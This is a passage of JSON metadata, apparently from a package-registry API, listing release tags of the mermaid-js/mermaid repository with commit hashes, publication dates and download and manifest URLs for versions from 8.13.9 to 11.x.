.1.1","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/@mermaid-js/layout-elk@0.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@%40mermaid-js%2Flayout-elk%400.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Flayout-elk@0.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Flayout-elk@0.1.1/manifests"},{"name":"@mermaid-js/parser@0.2.0","sha":"158f9925cedd6e1a205635bd1b45e6dd58cac5f6","kind":"tag","published_at":"2024-08-24T07:06:16.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/@mermaid-js/parser@0.2.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/@mermaid-js/parser@0.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@%40mermaid-js%2Fparser%400.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Fparser@0.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Fparser@0.2.0/manifests"},{"name":"mermaid@11.0.1","sha":"4d10e3f2586fb8b08b72d93a1036a17d53153997","kind":"tag","published_at":"2024-08-23T15:04:26.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/mermaid@11.0.1","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/mermaid@11.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@mermaid%4011.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/mermaid@11.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/mermaid@11.0.1/manifests"},{"name":"v11.0.0","sha":"2cfdd1620a8ceef37c0b738569dfb8bcc0005547","kind":"commit","published_at":"2024-08-23T12:07:47.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v11.0.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v11.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@v11.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v11.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v11.0.0/manifests"},{"name":"v10.9.1","sha":"dab26df9c4ca69cc4a8c46a22286a2f63ea9ed3e","kind":"commit","published_at":"2024-05-14T10:55:39.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v10.9.1","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v10.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@v10.9.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.9.1/manifests"},{"name":"v10.9.0","sha":"da33867ad798872d9f8406532263ff5e569f1185","kind":"commit","published_at":"2024-03-05T17:22:07.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v10.9.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v10.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@v10.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.9.0/manifests"},{"name":"v10.8.0","sha":"51e7444b94ab0b872eaabc3b138184b47442fab4","kind":"commit","published_at":"2024-02-02T10:10:42.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v10.8.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v10.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@v10.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.8.0/manifests"},{"name":"v10.7.0","sha":"dc857f804e955484b2f92cefc0aaa7b4afb159c4","kind":"commit","published_at":"2024-01-15T09:17:03.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v10.7.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v10.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@v10.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.7.0/manifests"},{"name":"v10.6.1","sha":"65daab2aaf8fc3e54f34b2d468d19486034e06c7","kind":"commit","published_at":"2023-11-06T13:57:01.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v10.6.1","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v10.6.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@v10.6.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.6.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.6.1/manifests"},{"name":"v10.6.0","sha":"29942c04dc92a64f8c618d6d55f9b57800341cf5","kind":"commit","published_at":"2023-10-25T09:07:12.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v10.6.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v10.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@v10.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.6.0/manifests"},{"name":"v10.5.1","sha":"b70959daa7666d25416ab3c4b89ffbc328927d20","kind":"commit","published_at":"2023-10-20T12:30:52.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v10.5.1","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v10.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@v10.5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.5.1/manifests"},{"name":"v10.5.0","sha":"bb0d549d0dc489767b240a910a6831b4a7771fd2","kind":"commit","published_at":"2023-10-02T08:00:13.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v10.5.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v10.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@v10.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.5.0/manifests"},{"name":"v10.4.0","sha":"8e5275d8441def82597db534f5a15b27cc6376a7","kind":"commit","published_at":"2023-08-25T12:19:00.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v10.4.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v10.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@v10.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.4.0/manifests"},{"name":"v10.3.1","sha":"a0b80f5490f812ccbc74d6246f2ecc39b03db147","kind":"commit","published_at":"2023-08-11T12:03:56.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v10.3.1","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v10.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@v10.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.3.1/manifests"},{"name":"v10.3.0","sha":"165e0b6c6862e183c9bdb75fbc5839555bbc99d0","kind":"commit","published_at":"2023-07-26T07:49:15.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v10.3.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v10.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@v10.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.3.0/manifests"},{"name":"v10.2.4","sha":"453b337e6e0e6f02357293764c27c29c236fe848","kind":"commit","published_at":"2023-06-30T11:10:22.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v10.2.4","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v10.2.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@v10.2.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.2.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.2.4/manifests"},{"name":"v10.2.3","sha":"75f9de3d4ae79b8939607872fa9467d5413855ff","kind":"commit","published_at":"2023-06-08T14:24:25.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v10.2.3","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v10.2.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@v10.2.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.2.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.2.3/manifests"},{"name":"v10.2.2","sha":"d2409dc1638f1e8c3d006a3350b598d69d2f7a50","kind":"commit","published_at":"2023-06-02T06:50:59.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v10.2.2","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v10.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@v10.2.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.2.2/manifests"},{"name":"v10.2.1","sha":"48e5d743b3bb0264390644b0d054850d821097e5","kind":"commit","published_at":"2023-06-01T11:03:14.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v10.2.1","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v10.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@v10.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.2.1/manifests"},{"name":"v10.2.0","sha":"8d43b87200ba0b59f6800942e03154dccc6b57b7","kind":"commit","published_at":"2023-05-24T17:03:22.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v10.2.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v10.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@v10.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.2.0/manifests"},{"name":"v10.1.0","sha":"e7c237dcf3062cd6163e129aedc620ef08d6f89a","kind":"commit","published_at":"2023-04-04T13:19:15.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v10.1.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v10.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@v10.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.1.0/manifests"},{"name":"v9.4.3","sha":"1a7b8d38970f367e273b61599e6c4f75a8635158","kind":"commit","published_at":"2023-03-07T18:00:44.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v9.4.3","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v9.4.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@v9.4.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v9.4.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v9.4.3/manifests"},{"name":"v9.4.2","sha":"c965e4c4564441975b71f0996e3a7ec2167ae21d","kind":"commit","published_at":"2023-03-07T15:50:32.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v9.4.2","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v9.4.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@v9.4.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v9.4.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v9.4.2/manifests"},{"name":"v10.0.2","sha":"20298d243ad1bf0447800a3ec24851d6bac8b6fa","kind":"commit","published_at":"2023-03-02T12:45:56.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v10.0.2","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v10.0.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@v10.0.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.0.2/manifests"},{"name":"v10.0.1","sha":"4a9d96aaba6c5a1ebb295d085b421d9102d83e96","kind":"commit","published_at":"2023-03-01T13:04:03.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v10.0.1","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v10.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@v10.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.0.1/manifests"},{"name":"v10.0.0","sha":"555d4f2cdc83ebeaf0b41f57a05722ffb6d921af","kind":"commit","published_at":"2023-02-21T07:57:37.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v10.0.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v10.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@v10.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.0.0/manifests"},{"name":"v9.4.0","sha":"97614b8af56a122022a71267996c0646b4a1e312","kind":"commit","published_at":"2023-02-15T14:54:02.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v9.4.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v9.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@v9.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v9.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v9.4.0/manifests"},{"name":"v9.3.0","sha":"5735efacbe58634dcff91317170be2e010b7283e","kind":"commit","published_at":"2022-12-15T09:16:12.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v9.3.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v9.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@v9.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v9.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v9.3.0/manifests"},{"name":"v9.2.2","sha":"9bb0ed2040cce9be83c63e097e26e4b361a8bdd6","kind":"commit","published_at":"2022-11-09T14:54:39.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v9.2.2","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v9.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@v9.2.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v9.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v9.2.2/manifests"},{"name":"v9.2.1","sha":"ba7f83019f06d092a4549b98ebc97679fda196a8","kind":"commit","published_at":"2022-11-08T14:25:05.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v9.2.1","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v9.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@v9.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v9.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v9.2.1/manifests"},{"name":"v9.2.0","sha":"e78ac9b92a75223df728b4a1866a8d7d460a4691","kind":"commit","published_at":"2022-11-01T14:27:20.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v9.2.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v9.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@v9.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v9.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v9.2.0/manifests"},{"name":"v9.1.7","sha":"0c0468123fa1ca08baf69716eeca0b8872075b5e","kind":"commit","published_at":"2022-09-13T17:55:34.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v9.1.7","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v9.1.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@v9.1.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v9.1.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v9.1.7/manifests"},{"name":"9.1.6","sha":"a89b6fd0549a91fb09e72c4e40decf5a0b866828","kind":"commit","published_at":"2022-08-18T17:57:58.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/9.1.6","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/9.1.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@9.1.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/9.1.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/9.1.6/manifests"},{"name":"9.1.5","sha":"af8a5cbbfac33c54d4b1615611fdcc7575180ef1","kind":"commit","published_at":"2022-08-11T18:29:15.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/9.1.5","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/9.1.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@9.1.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/9.1.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/9.1.5/manifests"},{"name":"9.1.4","sha":"4dcf7feec02ed40e86ff23f78430e1074b6d5ab6","kind":"commit","published_at":"2022-08-04T18:25:37.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/9.1.4","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/9.1.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@9.1.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/9.1.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/9.1.4/manifests"},{"name":"9.1.3","sha":"1509ee68bede6c6dc12bcc196d54b89f3b97ac4a","kind":"tag","published_at":"2022-06-28T18:03:42.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/9.1.3","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/9.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@9.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/9.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/9.1.3/manifests"},{"name":"9.1.2","sha":"3b8d74f1f9be198617491809535158bdc83c2ed2","kind":"tag","published_at":"2022-06-14T17:31:19.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/9.1.2","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/9.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@9.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/9.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/9.1.2/manifests"},{"name":"9.1.1","sha":"5a9ec30803398464688f7e460fc66a008814d7a2","kind":"tag","published_at":"2022-05-11T12:29:16.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/9.1.1","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/9.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@9.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/9.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/9.1.1/manifests"},{"name":"9.1.0","sha":"8889b05d29442062c9162458fa595d5abd3903d4","kind":"tag","published_at":"2022-05-10T16:46:08.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/9.1.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/9.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@9.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/9.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/9.1.0/manifests"},{"name":"9.0.1","sha":"179584b4bbfd3738d51021272819e48648b30614","kind":"tag","published_at":"2022-04-21T20:06:16.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/9.0.1","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/9.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@9.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/9.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/9.0.1/manifests"},{"name":"9.0.0","sha":"f72d3c43723c30ba1eec825d97e46fae84e5b502","kind":"tag","published_at":"2022-04-07T18:47:11.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/9.0.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/9.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@9.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/9.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/9.0.0/manifests"},{"name":"8.14.0","sha":"cbe3a9159db4d5e67d270fe701cd63de1510f6ee","kind":"tag","published_at":"2022-02-10T17:57:37.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.14.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.14.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.14.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.14.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.14.0/manifests"},{"name":"8.13.11","sha":"3877b88e6e1dba5d3e52ea23fad66d0545ec5ab0","kind":"commit","published_at":"2022-02-10T16:10:44.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.13.11","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.13.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.13.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.13.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.13.11/manifests"},{"name":"8.13.10","sha":"2de2cb64f8d0fa6917e0fae071c0a03bba10df83","kind":"commit","published_at":"2022-01-22T09:11:06.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.13.10","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.13.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.13.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.13.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.13.10/manifests"},{"name":"8.13.9","sha":"77f2a57155cfd9375eb0f633d365b6bd75c31158","kind":"commit","published_at":"2022-01-16T14:28:00.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.13.9","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.13.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.13.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.13.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.